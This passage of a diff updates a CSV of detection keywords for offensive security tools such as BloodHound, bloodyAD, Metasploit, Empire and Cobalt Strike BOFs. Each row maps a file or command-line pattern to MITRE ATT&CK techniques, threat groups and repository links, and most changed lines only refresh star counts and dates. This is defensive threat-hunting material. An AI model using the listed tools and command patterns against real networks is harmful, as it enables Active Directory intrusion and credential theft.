Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069","TA0007","N/A","N/A","Exploitation tools","https://github.com/fox-it/BloodHound.py","1","0","N/A","10","10","1538","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" -"*bloodhound.py*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1538","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" -"*bloodhound.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*bloodhound_output*/dev/null*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*bloodhound_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*bloodhound_output_dconly_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*BloodHoundAD*","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069 - T1482 - T1018 - T1087 - T1027 - T1046","TA0007 - TA0003 - TA0002 - TA0040 - TA0043","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/BloodHound","1","1","N/A","10","10","8799","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z" -"*BloodHoundAD*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z" +"*bloodhound --no-sandbox*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","0","N/A","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" +"*BloodHound-*.zip*","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069 - T1482 - T1018 - T1087 - T1027 - T1046","TA0007 - TA0003 - TA0002 - TA0040 - TA0043","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/BloodHound","1","1","N/A","10","10","8802","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z" +"*bloodhound.ad.*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" +"*bloodhound.bin*","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069 - T1482 - T1018 - T1087 - T1027 - T1046","TA0007 - TA0003 - TA0002 - TA0040 - TA0043","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/BloodHound","1","1","N/A","10","10","8802","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z" +"*bloodhound.enumeration*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" +"*BloodHound.ps1*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SPN.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*bloodhound.py *","offensive_tool_keyword","BloodHound.py","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069","TA0007","N/A","N/A","Exploitation tools","https://github.com/fox-it/BloodHound.py","1","0","N/A","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" +"*bloodhound.py*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" +"*bloodhound.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*bloodhound_output*/dev/null*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*bloodhound_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*bloodhound_output_dconly_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*BloodHoundAD*","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069 - T1482 - T1018 - T1087 - T1027 - T1046","TA0007 - TA0003 - TA0002 - TA0040 - TA0043","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/BloodHound","1","1","N/A","10","10","8802","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z" +"*BloodHoundAD*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" "*BloodHoundGraphToGoFetchPath*","offensive_tool_keyword","GoFetch","GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Exploitation tools - AD Enumeration","https://github.com/GoFetchAD/GoFetch","1","0","N/A","10","7","615","126","2017-06-20T14:15:10Z","2017-04-11T10:45:23Z" "*bloodhound-import -du neo4j -dp *.json*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*BloodHound-master*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1538","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" -"*BloodHound-modified.ps1*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*bloodhound-python*","offensive_tool_keyword","bloodhound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069","TA0007","N/A","N/A","Frameworks","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1538","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" +"*BloodHound-master*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" +"*BloodHound-modified.ps1*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*bloodhound-python*","offensive_tool_keyword","bloodhound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069","TA0007","N/A","N/A","Frameworks","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" "*bloodhound-quickwin -u * -p *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*bloodhound-quickwin-main*","offensive_tool_keyword","bloodhound-quickwin","Simple script to extract useful informations from the combo BloodHound + Neo4j","T1087 - T1087.001 - T1018 - T1069 - T1069.002","TA0007 - TA0003 - TA0004","N/A","N/A","AD Enumeration","https://github.com/kaluche/bloodhound-quickwin","1","1","N/A","6","2","162","17","2023-07-17T14:31:51Z","2021-02-16T16:04:16Z" -"*bloodyAD -*","offensive_tool_keyword","bloodyAD","BloodyAD is an Active Directory Privilege Escalation Framework","T1078.004 - T1059.003 - T1071.001","TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/bloodyAD","1","0","N/A","10","9","883","96","2023-09-01T09:12:45Z","2021-10-11T15:07:26Z" -"*bloodyAD.py*","offensive_tool_keyword","bloodyAD","BloodyAD is an Active Directory Privilege Escalation Framework","T1078.004 - T1059.003 - T1071.001","TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/bloodyAD","1","1","N/A","10","9","883","96","2023-09-01T09:12:45Z","2021-10-11T15:07:26Z" -"*bloodyAD-main*","offensive_tool_keyword","bloodyAD","BloodyAD is an Active Directory Privilege Escalation Framework","T1078.004 - T1059.003 - T1071.001","TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/bloodyAD","1","1","N/A","10","9","883","96","2023-09-01T09:12:45Z","2021-10-11T15:07:26Z" +"*bloodyAD -*","offensive_tool_keyword","bloodyAD","BloodyAD is an Active Directory Privilege Escalation Framework","T1078.004 - T1059.003 - T1071.001","TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/bloodyAD","1","0","N/A","10","9","883","96","2023-10-04T14:38:56Z","2021-10-11T15:07:26Z" +"*bloodyAD.py*","offensive_tool_keyword","bloodyAD","BloodyAD is an Active Directory Privilege Escalation Framework","T1078.004 - T1059.003 - T1071.001","TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/bloodyAD","1","1","N/A","10","9","883","96","2023-10-04T14:38:56Z","2021-10-11T15:07:26Z" +"*bloodyAD-main*","offensive_tool_keyword","bloodyAD","BloodyAD is an Active Directory Privilege Escalation Framework","T1078.004 - T1059.003 - T1071.001","TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/bloodyAD","1","1","N/A","10","9","883","96","2023-10-04T14:38:56Z","2021-10-11T15:07:26Z" "*bluekeepscanner.exe*","offensive_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands","T1087 - T1012 - T1064 - T1210 - T1213 - T1566 - T1071","TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/vletoux/pingcastle","1","1","N/A","N/A","","N/A","","","" "*bm90cmVkYW1lY2hlYXRzdG93aW4-*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*bob@moozle.wtf*","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" "*BOF prototype works!*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses handwritten shellcode to return the process Environment strings without touching any DLL's.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/whereami","1","0","N/A","10","10","152","27","2023-03-13T15:56:38Z","2021-08-19T22:32:34Z" -"*bof*/CredEnum/*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","153","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" +"*bof*/CredEnum/*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","154","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" "*BOF.NET.git*","offensive_tool_keyword","BOF.NET","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","0","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" "*BOF.NET-main*","offensive_tool_keyword","BOF.NET","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","0","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" -"*BOF/*procdump/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*BOF/*procdump/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" 